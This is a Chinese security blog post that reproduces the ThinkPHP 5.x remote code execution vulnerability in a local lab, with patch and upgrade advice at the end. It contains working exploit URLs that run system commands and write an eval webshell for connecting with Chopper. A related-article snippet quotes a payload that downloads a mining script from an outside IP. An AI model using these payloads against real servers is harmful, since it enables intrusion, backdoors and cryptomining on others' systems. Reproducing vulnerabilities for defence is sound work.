thinkphp5+远程代码执行_ThinkPHP远程代码执行漏洞

最新推荐文章于 2024-04-14 00:08:47 发布
最新推荐文章于 2024-04-14 00:08:47 发布
阅读量413 收藏 1
点赞数 1
文章标签: thinkphp5+远程代码执行 thinkphp漏洞

网安引领时代,弥天点亮未来   

漏洞介绍

ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架。

Thinkphp5.x版本中存在一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令

影响范围

Thinkphp 5.1.0 - 5.1.31

Thinkphp 5.0.5 - 5.0.23

漏洞利用

环境介绍:

thinkphp5.0.22+php5.4.45+ apache2.4.23

1.首先搭建好相应的环境,页面访问如下:

84587ae0482271ab350520266cac4b4b.png

2.当看到框架为thinkphp5.x时,我们需要的就是验证是否存在远程代码执行漏洞

http:// localhost/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

07bb0e3b0fb3507bc668141d03bd1d28.png

3.确认此处存在远程代码执行后,写入shell

http:// localhost/public/index.php?s =index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php  eval(@$_POST['a']); ?>

0cbfda45ec4f23ced29bd9967bcfbe12.png

4.尝试用菜刀进行连接,连接成功

458b057f9f52cefc19699f3b460d3330.png

当然这里我们也可以选择直接上传大马

800a9b32768dd98f0a4c991964062922.png

相比手工,我们也可以选择工具直接getshell都是可以的

009650cc4ce19e66bafb8d53bf73618b.png

修复建议

1、打补丁:

Thinkphp v5.0.x补丁地址:

https://github.com/top-think/framework/commit/b797d7235

2e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x补丁地址: 

https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126ab

c5901b2815

2、更新框架版本

参考链接

exploit地址:

https://www.exploit-db.com/exploits/45978

框架下载地址:

http://www.thinkphp.cn/donate/download/id/1125.html

docker漏洞环境源码:

https://github.com/vulnspy/thinkphp-5.1.29

640 

     知识分享完了

喜欢别忘了关注我们哦~

予以风动,必降弥天之润!

   弥  天

安全实验室

94aad1db1d61b9a6e82cc8cb7d34a078.png
weixin_39673471
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp自定义url_渗透记实|ThinkPhp绕过限制GetShell
weixin_39623671的博客
12-16 972
0x01 前言项目里遇到一个站,用的是ThinkPHP V5.0.*框架,且开启了debug模式,本以为一发payload的就能解决的事情,没想到拿下的过程还得小绕一下...0x02 踩坑尝试命令执行,system被限制了尝试包含日志文件,open_basedir限制了这里有个思路,可以去包含runtime下的日志文件,但是thinkphp的日志文件比较大,而且有时候会有很多奇怪的问题阻...
thinkphp v5.0.24 密码爆破_实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露
weixin_39913472的博客
11-25 7201
文章来源:NearSec记录一下渗透过程中的思路以及遇到的难点,不足之处还请各位大佬多多包涵。拿到目标站点:http://**.****.cn首先针对目标进行子域名收集发现存在http://t**.****.cn域名,为测试系统URL后面随便输入个目录,发现是ThinkPHP 3.2.3的系统,目前公开渠道没有可直接GetShell的漏洞尝试加上/admin可以进入到后台登录页,使用Burp挂载弱...
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
挖矿程序 入侵php,利用ThinkPHP漏洞下载并执行挖矿脚本
weixin_33173126的博客
03-17 1259
利用url如下:/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;curl%20http://205.185.113.123...
Thinkphp框架漏洞--->5,2024年最新网络安全进阶
最新发布
2401_83947105的博客
04-14 999
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
漏洞名称:RMI 未授权访问漏洞
qq_36902628的博客
03-21 1692
漏洞名称:RMI 未授权访问漏洞
如何利用ThinkPHPv5的漏洞来getshell
星空下de青铜
03-26 3309
影响范围 ThinkPHP 5.0系列 < 5.0.24 过程 查看信息 http://ip(url)/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=id(1,2,3之类的) http://ip(url)/index.php?s=index/think\app/invokefuncti...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
ThinkPhp5+bootstrap搭建个人博客网站
12-31
综上所述,"ThinkPhp5+bootstrap搭建个人博客网站"项目是一个全面的实践,涵盖了后端开发、前端设计、数据库管理和服务器配置等多个方面。通过学习和实践,开发者不仅可以掌握ThinkPhp5框架和Bootstrap的使用,还能...
Thinkphp5+layui响应式企业站源码.zip
02-25
Thinkphp5与Layui构建响应式企业网站详解》 在现代互联网环境中,企业站的设计与开发至关重要,它不仅代表了企业的形象,也是与客户交互的重要窗口。本篇文章将深入探讨如何使用Thinkphp5框架结合Layui前端组件库...
Thinkphp5+element+vue开发的后台管理系统
12-19
5. vue项目端口(链接api需要注意更改api.js中的api请求地址)、配置好thinkphp接口 xampp端口(配置php需要注意数据库链接),数据库mysql 6. 缺陷:代码可能太乱了,不过比起上次发布的要好很多了。
完整的Thinkphp5+LayUI开源后台管理系统源码.rar
08-05
本篇将深入探讨"完整的Thinkphp5+LayUI开源后台管理系统源码"这一资源,包括其核心组件、设计理念以及实际应用中的关键知识点。 首先,Thinkphp5(简称TP5)是基于PHP的轻量级MVC(Model-View-Controller)框架,以...
Java RMI 远程代码执行漏洞
LuckySec
11-30 3277
Java RMI服务是远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列化来完成所有的交互,如果该服务器Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
漏洞名称-RMI 未授权访问漏洞
qq_44005305的博客
03-10 1030
漏洞描述:RMI默认使用序列化来完成所有的交互,如果该端口暴露在公网上,且使用了Apache CommonsCollections的漏洞版本,就可以在该服务器上执行相关命令。漏洞危害:攻击者可在没有认证的情况下直接操作对应的 API接口,可直接被非法增删改次数据。且因为攻击是在未认证下进行的,所以后续无法通过定位用户进行异常排查。
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 3053
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞
不曾扬帆,何以至远方
07-17 1901
Thinkphp 5 远程代码执行漏洞
ThinkPHP5远程代码执行漏洞
weixin_50464560的博客
08-15 3982
https://zhuanlan.zhihu.com/p/52173644 2018年12月10日,白帽汇安全研究院发现thinkphp官网发布了安全更新,修复了一个远程代码执行漏洞,该漏洞是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。此次爆出漏洞ThinkPHP 5.x版本是官方于2015年发布的新一代框架,其中5.1.0RC版本于今年的5月2日发布,但在短短几个月时间内就爆出远程代码执行漏洞
漏洞预警| ThinkPHP多版本存在远程代码执行漏洞
LJQClqjc的博客
12-12 1066
棱镜七彩安全漏洞预警
【vulhub】Weblogic(CVE-2018-2628)漏洞复现
qq_45300786的博客
04-10 2463
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
thinkphp5+mysql 二表实现二级联动
05-01
下面是如何使用ThinkPHP5和MySQL实现二级联动的步骤: 1. 创建两个MySQL表格,一个存储父级选项,一个存储子级选项,一般使用"id","name"等字段表示内容。 2. 编写ThinkPHP5中的控制器文件,从父级选项中获取所有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值